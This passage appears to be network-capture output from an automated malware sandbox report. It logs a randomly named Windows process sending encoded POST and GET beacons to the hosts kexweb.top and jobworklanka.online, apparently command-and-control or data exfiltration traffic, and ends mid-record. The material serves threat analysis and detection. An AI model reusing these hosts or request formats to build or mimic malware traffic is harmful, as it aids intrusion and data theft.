Sep 5, 2024 09:06:22.024669886 CEST	914	IN	Data Raw: 3d 6c 61 6e 67 75 61 67 65 6d 6f 64 65 6c 2e 70 72 6f 22 3e 3c 73 74 72 6f 6e 67 3e 56 69 65 77 20 74 68 65 20 57 48 4f 49 53 20 72 65 73 75 6c 74 73 20 6f 66 20 6c 61 6e 67 75 61 67 65 6d 6f 64 65 6c 2e 70 72 6f 3c 2f 73 74 72 6f 6e 67 3e 3c 2f Data Ascii: =languagemodel.pro"><strong>View the WHOIS results of languagemodel.pro</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.22	49177	63.250.47.40	80	1036	C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 09:06:27.220551968 CEST	2472	OUT	POST /3bdq/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.kexweb.top Origin: http://www.kexweb.top Content-Type: application/x-www-form-urlencoded Content-Length: 2165 Connection: close Cache-Control: max-age=0 Referer: http://www.kexweb.top/3bdq/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Data Raw: 41 38 5f 70 53 50 64 58 3d 72 4e 72 50 44 42 69 6b 6e 56 71 58 76 64 53 57 2b 6f 50 54 55 75 58 6c 77 71 6f 4e 4c 35 6b 54 32 72 57 73 72 32 76 32 65 58 61 72 4c 52 6e 71 68 6c 76 59 7a 46 59 6f 46 34 73 4b 4f 6b 51 46 4b 55 6e 35 72 72 76 33 6b 61 46 73 33 6a 45 34 68 71 38 34 6a 30 77 62 69 37 70 77 6e 7a 79 76 6a 6f 58 6c 70 68 52 42 5a 55 43 79 52 46 55 6c 6f 6d 4f 44 54 37 48 76 4c 4d 30 4f 45 51 71 7a 6d 68 6e 77 4d 39 59 73 35 30 72 50 71 70 4f 55 48 43 37 45 46 45 58 4c 66 46 73 67 4f 32 45 48 73 68 49 63 32 36 2b 61 69 62 43 52 64 65 68 70 59 42 4e 4e 76 34 62 6a 70 61 32 64 41 2f 42 61 77 32 41 4d 41 78 6c 56 76 4a 69 73 74 70 66 48 73 49 74 41 6a 48 71 59 78 61 34 58 65 5a 44 73 73 32 6a 4a 58 63 4f 33 78 76 2b 58 6c 53 65 2b 7a 63 5a 76 45 63 2b 2f 73 50 44 41 6a 51 4c 39 69 78 65 4f 43 6b 46 72 33 54 4a 2f 63 4a 42 66 35 34 45 59 4f 71 51 4e 4d 68 41 36 65 4b 4c 56 72 50 74 4b 61 47 56 57 6e 50 66 51 2f 73 35 72 4f 48 73 62 34 58 57 39 66 66 76 67 32 6d 4e 78 59 78 6e 4c 31 67 31 78 74 [TRUNCATED] Data Ascii: A8_pSPdX=rNrPDBiknVqXvdSW+oPTUuXlwqoNL5kT2rWsr2v2eXarLRnqhlvYzFYoF4sKOkQFKUn5rrv3kaFs3jE4hq84j0wbi7pwnzyvjoXlphRBZUCyRFUlomODT7HvLM0OEQqzmhnwM9Ys50rPqpOUHC7EFEXLfFsgO2EHshIc26+aibCRdehpYBNNv4bjpa2dA/Baw2AMAxlVvJistpfHsItAjHqYxa4XeZDss2jJXcO3xv+XlSe+zcZvEc+/sPDAjQL9ixeOCkFr3TJ/cJBf54EYOqQNMhA6eKLVrPtKaGVWnPfQ/s5rOHsb4XW9ffvg2mNxYxnL1g1xty01qtRIVWqPcUNDWd76DfOyYk6PqJ/t6y41F7tqRvNONeds4/1jRkKtiOsE3oHLyfPbe+hsaCL8/CZZ2f9wduVfGqURPrCuehBYWYkuoWAkHApVVQDEsQva5Wp4ew6Vw0dnzXLLAzHjcxD7/xvXxWd8jmwIW/hsPAH3s65tEjil0QM3Xp7kQAyQqXEYaq6CQEuNdWxG9bVqtV001XqLLdmsg7eCGnb6MvWjjtRndIeQzh4de/jnLb36Z8FEOQOwilpSfpIN1k5W6FGJZVjBqFI45c/uPHQisBuqM0IQsm8KkYHfWkpFItSipgiMxJOSXsnl/1Lw8tcRCWlW2Jv8lkexRZkRVQib7ahwUytyqOH3rU79fUp32gjgqFgKqohNbe/Ravak9ok46JxrsxEb68mfTHy/tIujbXRm5hRtoSMHPwSIrl0ljmL060NzR5yf1itWc9jwRY0oqk+ycYrTnfeJqLUEfCBbAROAnotqK/Pr8+aXSAr8Di0focz1oc5DTxXvedt6UBfd11jaCiA6jS/fRO4kLVXRIOx2+2pCX8ArcktW18fgrCFF8QFPe8vHFhgvewqvNx/CteKac93xHxTzpy5yGCPTKWydJI/AA/gWJ7QV7k4w1SbmERKJbumqvPfTRCoOn7Qd/rBQtlTMg/7A9v/MBmhx4OY [TRUNCATED]
Sep 5, 2024 09:06:27.227649927 CEST	295	OUT	Data Raw: 69 57 4b 39 55 77 65 70 74 37 51 41 38 61 6f 4b 48 77 6c 79 7a 53 69 48 4b 79 6d 30 73 2f 6f 73 2b 70 6c 74 66 43 42 7a 54 45 61 6a 58 39 56 2f 76 63 39 54 64 65 75 4b 63 39 37 6e 75 39 4e 36 39 32 41 73 69 72 56 66 68 50 6d 4f 30 69 46 58 50 66 Data Ascii: iWK9Uwept7QA8aoKHwlyzSiHKym0s/os+pltfCBzTEajX9V/vc9TdeuKc97nu9N692AsirVfhPmO0iFXPfuH5UEeIoyk4BKpmVQ1plYJqAfZBHp26DTDR9D+bACPysApVaxO0hzqud1xaFCbC4PM4CcP4JpBQWzGmT4WaSoWaaCg9xZ6iKqTVEzwYATtcSHy88y3iMX955a1OefCLfRN6t/+rHPllkdO2jApGJAmhpGpAUMe23B
Sep 5, 2024 09:06:27.800139904 CEST	533	IN	HTTP/1.1 404 Not Found Date: Thu, 05 Sep 2024 07:06:27 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.22	49178	63.250.47.40	80	1036	C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 09:06:29.757404089 CEST	2472	OUT	POST /3bdq/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.kexweb.top Origin: http://www.kexweb.top Content-Type: application/x-www-form-urlencoded Content-Length: 3629 Connection: close Cache-Control: max-age=0 Referer: http://www.kexweb.top/3bdq/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Data Raw: 41 38 5f 70 53 50 64 58 3d 72 4e 72 50 44 42 69 6b 6e 56 71 58 75 37 69 57 35 61 6e 54 58 75 58 36 73 61 6f 4e 4c 35 6b 52 32 72 57 6b 72 32 76 32 65 57 6d 72 4c 54 66 71 6c 6c 76 59 79 46 59 6e 62 6f 73 4b 4f 6b 51 47 4b 51 33 54 72 72 79 43 6b 63 4a 73 33 6e 77 34 68 72 38 34 72 55 77 62 71 62 70 2b 6e 7a 33 4d 6a 6f 62 58 70 67 39 6e 5a 52 61 79 44 6e 73 6c 70 56 32 4d 59 72 48 70 65 63 30 46 45 51 6d 4b 6d 68 66 47 4d 38 51 43 35 7a 54 50 72 5a 4f 55 42 79 37 44 61 55 57 44 62 46 73 2b 4f 32 59 54 73 68 49 59 32 36 37 50 69 62 4f 52 66 4d 35 70 59 47 5a 4b 67 49 62 38 6e 36 32 64 4e 66 42 63 77 32 41 71 41 78 6c 56 76 49 4f 73 73 35 66 48 73 4a 74 48 74 6e 71 59 34 36 35 56 51 35 4f 56 73 33 48 7a 58 63 65 34 78 39 53 58 6b 58 79 2b 30 73 5a 76 4d 4d 2b 39 73 50 44 42 31 67 4c 4c 69 78 47 77 43 6c 31 37 33 54 4a 2f 63 4d 4e 66 75 61 63 59 4a 36 51 4e 43 78 41 37 52 71 4c 57 72 50 70 53 61 47 52 57 6e 4f 58 51 2f 65 52 72 4d 46 55 59 67 58 57 34 49 2f 76 6d 79 6d 4d 7a 59 78 72 74 31 6b 73 6d 74 [TRUNCATED] Data Ascii: A8_pSPdX=rNrPDBiknVqXu7iW5anTXuX6saoNL5kR2rWkr2v2eWmrLTfqllvYyFYnbosKOkQGKQ3TrryCkcJs3nw4hr84rUwbqbp+nz3MjobXpg9nZRayDnslpV2MYrHpec0FEQmKmhfGM8QC5zTPrZOUBy7DaUWDbFs+O2YTshIY267PibORfM5pYGZKgIb8n62dNfBcw2AqAxlVvIOss5fHsJtHtnqY465VQ5OVs3HzXce4x9SXkXy+0sZvMM+9sPDB1gLLixGwCl173TJ/cMNfuacYJ6QNCxA7RqLWrPpSaGRWnOXQ/eRrMFUYgXW4I/vmymMzYxrt1ksmtxs1qvpIUy+PcENMRd7+HfC2YkzYqJ6a60I1EpFqF65NPudq9/1TVkKbiIw63onLyu3bMuBsezLzziZkkv9ZUOVLGqAZPp7rdUtYEYkurwclPwpccwDSnwvE5WpKeyyvwElnzXbLOFzjcxD66xvV7zFkjm9AW7B8PAr3sKJtEnOl4QM3dJ6uegygqXBjaqSSQ06Nd1pGuI9q4F023XqKWtn8g/yCGnPqMuijiMRnft+Q/B4Zd/jCLb3+Z8JYOQeOimBSftkN+F5W3lGMfVjFuFJG5cH+PHEMsAmqdnAQuTAKl4HRUkpFBNS6pgK6xNekXoTl/Ebw6NceFWlX0Jv/zUevRZ0RVQ+b7eVwXBVyu9v3007/BUpt/AvUqFxzqs57bYvRb7Ok+qM7jpxtpxFUxcm7THyjtIGNYmxm40dtq2QEHwSD810IpGKL60doR7u21R5Wc8TwRKsoqU+ycYrQnfeNqLY2fCRxAROA1JtqKM3rouaeQAq6Hi07oc3foYVpTx7vYMh6UBfaq1jZFiA7jSzoRO5uLVrRI/V2/lhCXZUrbEtW8cfn9yFE8QFfe9juFggvfDyvK3DN0OKXa92ySAv4py00GADTJkmdIaXAAvgWH7QU1E45xSX6ERWjbqiEu6vTRxgOl8Mcz7BRzVT0g/2w9uHyBmpL4No [TRUNCATED]
Sep 5, 2024 09:06:29.765023947 CEST	1759	OUT	Data Raw: 6a 58 58 39 56 38 65 70 73 62 51 41 66 43 6f 4c 6e 77 69 76 6a 53 2f 48 4b 7a 35 30 73 6e 4b 73 2f 55 67 74 5a 75 42 79 32 51 61 33 45 46 56 32 2f 63 6a 54 64 65 34 48 38 41 42 6e 75 39 42 36 2b 71 41 73 69 37 56 66 6e 44 6d 4f 6b 69 61 66 66 65 Data Ascii: jXX9V8epsbQAfCoLnwivjS/HKz50snKs/UgtZuBy2Qa3EFV2/cjTde4H8ABnu9B6+qAsi7VfnDmOkiaffeJC5UHQoptk4BepnV+1rJYJY4fPgHp3KC5Jx9qpLEQPyQEpXzGOGpzrcV17PpCKy4MFYCrP4FBBQmRGjPWRvqoXqaCteVaryKkUVEiwYB0tcqDy5Nt3mEX97hayueeA7fII6tl+rbmll83O2zApE9AnCRGuAUMWW3A
Sep 5, 2024 09:06:30.414475918 CEST	533	IN	HTTP/1.1 404 Not Found Date: Thu, 05 Sep 2024 07:06:30 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.22	49179	63.250.47.40	80	1036	C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 09:06:32.295969963 CEST	555	OUT	GET /3bdq/?A8_pSPdX=mPDvA1qI3GiuntP60f/rUorn47smR4p61+amzFfuWlPCagi05gb6jW0dSPIhEEY5GlOsioyOqKhT4H0OrZxilUUqq6EOplLI1qPNmT9wcl66RlEMoF/NT9bmJ4pJ&38R0=jHY4nFvHAVc8 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.kexweb.top Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Sep 5, 2024 09:06:32.877831936 CEST	548	IN	HTTP/1.1 404 Not Found Date: Thu, 05 Sep 2024 07:06:32 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.22	49180	91.184.0.200	80	1036	C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 09:06:37.963625908 CEST	2472	OUT	POST /ikh0/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.jobworklanka.online Origin: http://www.jobworklanka.online Content-Type: application/x-www-form-urlencoded Content-Length: 2165 Connection: close Cache-Control: max-age=0 Referer: http://www.jobworklanka.online/ikh0/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Data Raw: 41 38 5f 70 53 50 64 58 3d 6f 74 5a 63 79 65 48 58 52 73 55 61 6b 64 74 66 75 50 48 48 46 33 71 6c 56 47 2f 36 39 78 51 6e 64 31 6e 35 32 52 75 76 47 56 73 6f 76 68 58 30 42 4a 53 65 54 49 4f 65 51 5a 6e 68 4c 30 39 78 4d 33 69 6f 44 58 50 61 49 70 6a 63 79 68 36 41 45 79 2b 70 75 62 6d 6f 56 34 4e 54 6f 67 6b 49 64 6a 73 6d 51 35 50 34 62 41 76 70 70 39 67 48 72 45 31 6c 35 62 6c 2f 75 42 63 66 4e 30 7a 71 31 6c 50 57 31 6c 2f 30 63 79 69 49 63 63 32 31 43 72 43 78 44 57 52 54 79 35 58 50 45 6d 71 45 50 6b 37 55 68 37 67 4b 51 7a 4f 30 6d 4f 34 7a 46 2b 2b 61 75 6c 77 52 56 30 58 66 39 55 36 51 4e 49 4f 4c 52 57 4a 47 49 38 56 58 4e 61 79 62 48 6e 51 39 54 6c 7a 4c 50 4f 75 77 37 66 34 77 35 69 71 36 52 63 77 75 7a 46 65 38 62 4e 4b 4e 72 31 35 67 6e 5a 54 53 6d 45 32 57 33 30 71 71 79 65 55 74 36 4a 62 36 61 42 43 72 78 46 30 70 6c 76 67 59 43 47 38 36 7a 56 62 50 73 46 35 39 53 36 4e 63 33 69 78 69 43 6b 75 58 64 4e 38 46 47 2f 50 4d 35 4a 33 50 70 47 53 6a 50 71 39 56 33 54 71 70 47 38 51 55 78 [TRUNCATED] Data Ascii: A8_pSPdX=otZcyeHXRsUakdtfuPHHF3qlVG/69xQnd1n52RuvGVsovhX0BJSeTIOeQZnhL09xM3ioDXPaIpjcyh6AEy+pubmoV4NTogkIdjsmQ5P4bAvpp9gHrE1l5bl/uBcfN0zq1lPW1l/0cyiIcc21CrCxDWRTy5XPEmqEPk7Uh7gKQzO0mO4zF++aulwRV0Xf9U6QNIOLRWJGI8VXNaybHnQ9TlzLPOuw7f4w5iq6RcwuzFe8bNKNr15gnZTSmE2W30qqyeUt6Jb6aBCrxF0plvgYCG86zVbPsF59S6Nc3ixiCkuXdN8FG/PM5J3PpGSjPq9V3TqpG8QUxKXzvAmhhO4ehvpiGhSInoG93e3BT4auH/7s8BGojKiqI97YgPUbipseCd7cp8vvemte+k+ZFm/La0t4w8ORKjBQ4l+Mow04tIMoTks23Rb3QcrteAfIPozZ9QZhdmgqskIYJ32w/y/tmlOUoedZZnf8UAbecJIj8tFqbVLCnXwo3tG8E+c2csTIqlSQ+dhzGut7ZUKJnZPFwqPkCjbZGSEKkpVLv0LqQhZi3x3ap+dAB/4QtcC//gbFFgdCoJJjgpP1N/H2P44KgXvmsHyCYGHGWBcqrrxwuAPykXSpdCdZUbWPOkto6QbZohN3aQpbbFtxeNhtB0tz8vuNeZuB7uuQ8YqgMuyrVGt0RpSq2jAqETkxDbe+GsH2pOYqsDc6WAfqeJNnJU1lblpfGWNMKp2gS7ysN1LpqoutVlkyYvgL6CzoG0ywPn/mUlZipUJgVs8ogkZSsZq83iB4GpVNJyyqx8MxiE6/2l0nKg6v5VkSSJhQ9kgCVuS4J59uQ02+XtWIspN3g9gMVgz/PFAxkNEJT213zuOIyW0/COgoAL2hiH2rwlgVpALcd6e5OM2D8sqeFh2ZwOvwlqzAxvKR2VThU7UxpaPij/BkbzqjO73ryHwPBT5E5y50itMBjbBI3osQkL3bjruuhZvQ4ir8PyBHuXUyrkCfCf7 [TRUNCATED]
Sep 5, 2024 09:06:37.968544006 CEST	322	OUT	Data Raw: 2f 78 33 41 66 41 6d 2f 38 55 2f 2b 66 55 2b 6c 65 70 31 6c 72 38 58 47 7a 57 7a 6b 6a 72 38 4f 48 36 68 79 58 71 4f 47 64 61 64 4d 6b 7a 64 2f 70 69 2b 53 56 31 77 73 6b 32 54 6c 74 32 78 4a 38 4b 45 4c 32 54 30 32 59 54 63 63 62 73 75 55 73 56 Data Ascii: /x3AfAm/8U/+fU+lep1lr8XGzWzkjr8OH6hyXqOGdadMkzd/pi+SV1wsk2Tlt2xJ8KEL2T02YTccbsuUsVJ1U+0EkeI7Htngamnk7Fb4SLSYg9ybaNA+e7sLWqRctQadPe5eLdSg/8cmON+goHnDW3o2QbmilU1EsNkOLb8HJHLxZYDQ0/wurYBxQXoAiZtJUdrUKXPcmHYhJOxthfIuTDn+T0lZ8IH1NULgigMCdtca9d6q6Cp
Sep 5, 2024 09:06:38.575887918 CEST	500	IN	HTTP/1.1 404 Not Found Date: Thu, 05 Sep 2024 07:06:38 GMT Server: Apache X-Xss-Protection: 1; mode=block Referrer-Policy: no-referrer-when-downgrade X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.22	49181	91.184.0.200	80	1036	C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 09:06:40.504463911 CEST	2472	OUT	POST /ikh0/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.jobworklanka.online Origin: http://www.jobworklanka.online Content-Type: application/x-www-form-urlencoded Content-Length: 3629 Connection: close Cache-Control: max-age=0 Referer: http://www.jobworklanka.online/ikh0/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Data Raw: 41 38 5f 70 53 50 64 58 3d 6f 74 5a 63 79 65 48 58 52 73 55 61 6b 39 64 66 74 38 76 48 41 33 71 6b 4b 57 2f 36 39 78 51 6c 64 31 6e 4c 32 52 75 76 47 57 34 6f 76 6a 66 30 41 5a 53 65 63 6f 4f 64 4c 5a 6e 68 4c 30 39 79 4d 7a 43 47 44 58 79 74 49 76 6e 63 79 67 36 41 45 7a 2b 70 70 62 6d 6f 63 59 4e 72 6f 67 59 2b 64 6a 41 70 51 35 69 6a 62 47 76 70 72 4f 59 48 6d 79 68 6b 77 4c 6c 78 35 52 63 45 4e 31 4f 58 31 6c 48 47 31 6b 61 70 63 78 57 49 62 73 32 31 45 62 44 6e 42 57 52 63 32 35 57 4d 45 6d 57 35 50 6b 36 64 68 36 45 67 51 7a 43 30 30 74 67 7a 46 39 57 56 71 31 77 53 61 55 58 66 67 45 36 46 4e 49 50 4b 52 57 4a 47 49 38 42 58 66 36 79 62 48 6a 4d 2b 4f 31 7a 4c 48 75 75 78 32 2f 6b 4f 35 69 2b 55 52 66 70 62 79 32 79 38 61 49 2b 4e 67 6c 35 67 76 4a 54 55 6d 45 32 68 2b 55 72 44 79 65 4d 6c 36 4a 4c 51 61 42 43 72 78 48 4d 70 68 39 34 59 55 47 38 36 72 6c 62 4f 31 56 35 38 53 36 35 75 33 68 74 69 43 6c 47 58 63 2f 6b 46 58 64 6e 44 67 70 32 6f 36 57 53 68 4c 71 39 6c 33 51 4f 44 47 38 6f 36 78 [TRUNCATED] Data Ascii: 